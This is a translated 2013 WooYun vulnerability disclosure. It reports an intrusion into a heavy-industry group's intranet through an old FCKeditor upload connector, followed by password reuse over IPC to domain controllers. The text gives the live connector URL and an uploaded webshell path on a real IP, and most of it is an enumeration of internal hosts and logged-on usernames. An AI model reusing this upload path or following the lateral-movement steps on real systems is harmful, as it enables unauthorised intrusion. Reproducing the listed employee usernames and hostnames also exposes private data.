
Vulnerability summary (followers: 24)

Defect ID: wooyun-2013-032800

Title: Arbitrary file upload plus a shared system password at a heavy-industry group can lead to compromise of the whole intranet

Vendor: a heavy-industry group

Author: 煦阳。

Submitted: 2013-07-30 14:05

Fixed: 2013-09-13 14:06

Published: 2013-09-13 14:06

Type: successful intrusion event

Severity: medium

Self-rated Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-07-30: details sent to the vendor, awaiting vendor handling
2013-08-03: vendor confirmed; details visible to the vendor only
2013-08-13: details opened to core white hats and domain experts
2013-08-23: details opened to regular white hats
2013-09-02: details opened to intern white hats
2013-09-13: details opened to the public

Brief description:

I didn't touch anything. Please don't come knocking on my door...
PS: could the reviewers give this a more badass title? XD

Detailed description:

http://218.5.70.231/manage/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
Old version: directory listing and arbitrary upload
http://218.5.70.231/1.asp htc
After privilege escalation, I used the current account's password to go over IPC into the DC subnet.
\\dc owned..
\\dcbak owned..
And then....
Nothing after that.. The process was very simple. I'll just drop a few screenshots~
I didn't touch anything. Please don't come knocking on my door...
Users currently logged on \\172.30.0.1:
A system error has occurred: 53
Users currently logged on \\172.30.0.5:
-- NETSERVER$
-- fong
-- Acronis Agent User
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- IUSR_NETSERVER
-- IUSR_NETSERVER
Users currently logged on \\172.30.0.6:
A system error has occurred: 53
Users currently logged on \\172.30.0.7:
-- FAX-SERVER$
-- Administrator
-- Administrator
-- IUSR_BI_BSC
Users currently logged on \\172.30.0.8:
A system error has occurred: 2138
Users currently logged on \\172.30.0.9:
-- NEWCAIWU$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.10:
A system error has occurred: 53
Users currently logged on \\172.30.0.11:
-- BETA-SERVER$
-- Administrator
-- Administrator
-- szz
Users currently logged on \\172.30.0.12:
-- CBMS-SERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.13:
-- FILE-SERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- UPLOAD
-- Administrator
-- IUSR_FILESERVER-BAK
-- UPLOAD
-- UPLOAD
-- IUSR_FILESERVER-BAK
-- UPLOAD
Users currently logged on \\172.30.0.15:
A system error has occurred: 53
Users currently logged on \\172.30.0.16:
A system error has occurred: 53
Users currently logged on \\172.30.0.17:
A system error has occurred: 53
Users currently logged on \\172.30.0.18:
A system error has occurred: 53
Users currently logged on \\172.30.0.21:
-- DATASERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.22:
-- BACKUPEXEC$
-- backup
-- IUSR_NETSERVER-BAK
-- backup
-- Administrator
-- backup
-- backup
Users currently logged on \\172.30.0.23:
A system error has occurred: 5
Users currently logged on \\172.30.0.24:
-- FILESERVER-BAK$
-- Administrator
Users currently logged on \\172.30.0.27:
-- EAD$
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.28:
-- EAD-BAK$
-- Administrator
Users currently logged on \\172.30.0.29:
A system error has occurred: 64
Users currently logged on \\172.30.0.30:
-- DCBAK$
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.32:
-- NETSERVER-BAK$
-- Administrator
Users currently logged on \\172.30.0.33:
-- DLP-SERVER$
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.34:
A system error has occurred: 64
Users currently logged on \\172.30.0.38:
-- BISERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.45:
A system error has occurred: 53
Users currently logged on \\172.30.0.54:
A system error has occurred: 53
Users currently logged on \\172.30.0.58:
A system error has occurred: 53
Users currently logged on \\172.30.0.80:
A system error has occurred: 53
Users currently logged on \\172.30.0.103:
-- -- huangzc
Users currently logged on \\172.30.0.105:
-- -- aigd
Users currently logged on \\172.30.0.108:
-- -- liangh
Users currently logged on \\172.30.0.109:
-- -- wangyl
Users currently logged on \\172.30.0.115:
A system error has occurred: 5
Users currently logged on \\172.30.0.121:
A system error has occurred: 5
Users currently logged on \\172.30.0.175:
A system error has occurred: 53
Users currently logged on \\172.30.0.176:
A system error has occurred: 53
Users currently logged on \\172.30.0.181:
A system error has occurred: 5
Users currently logged on \\172.30.0.202:
A system error has occurred: 53
Users currently logged on \\172.30.0.207:
-- -- chents
Users currently logged on \\172.30.0.215:
-- KE$
-- Amdin
Users currently logged on \\172.30.0.219:
A system error has occurred: 5
Users currently logged on \\172.30.0.220:
-- -- xufan
-- AvastSoftwareUpdater
Users currently logged on \\172.30.0.221:
-- -- zxf
Users currently logged on \\172.30.0.223:
-- -- guoyj
-- ASPNET
Users currently logged on \\172.30.0.224:
-- suqj
--
Users currently logged on \\172.30.0.225:
-- -- zhangchh
Users currently logged on \\172.30.0.226:
-- -- linfs
Users currently logged on \\172.30.0.251:
-- -- wangl
Users currently logged on \\172.30.0.254:
-- DC$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- IUSR_DC
-- IUSR_DC
-- IUSR_DC

Proof of vulnerability:

[Screenshot: fck.png]

[Screenshot: dc.png]

[Screenshot: shebei.png]

Suggested fix:

Well...

Copyright notice: please credit the source when reposting: 煦阳。@乌云


Vendor response

Vendor reply:

Severity: high

Vulnerability Rank: 13

Confirmed: 2013-08-03 17:18

Vendor comment:

Latest status:

None yet


Vulnerability discussion:

Comments

  1. 2013-07-30 15:24 | 煦阳。 ( regular white hat | Rank:134 vulns:27 | This person is lazy and left nothing behind. )

    @xsser @疯狗 The new title really is badass...

  2. 2013-07-30 15:57 | 疯狗 certified white hat ( intern white hat | Rank:44 vulns:2 | Having seen every vulnerability under heaven, the heart is naturally uncensored. )

    @煦阳。 - - !

  3. 2013-08-03 21:15 | 煦阳。 ( regular white hat | Rank:134 vulns:27 | This person is lazy and left nothing behind. )

    Thanks @cncert国家互联网应急中心, thanks CCTV, thanks MTV, thanks JPAV.. I got rank~ so happy~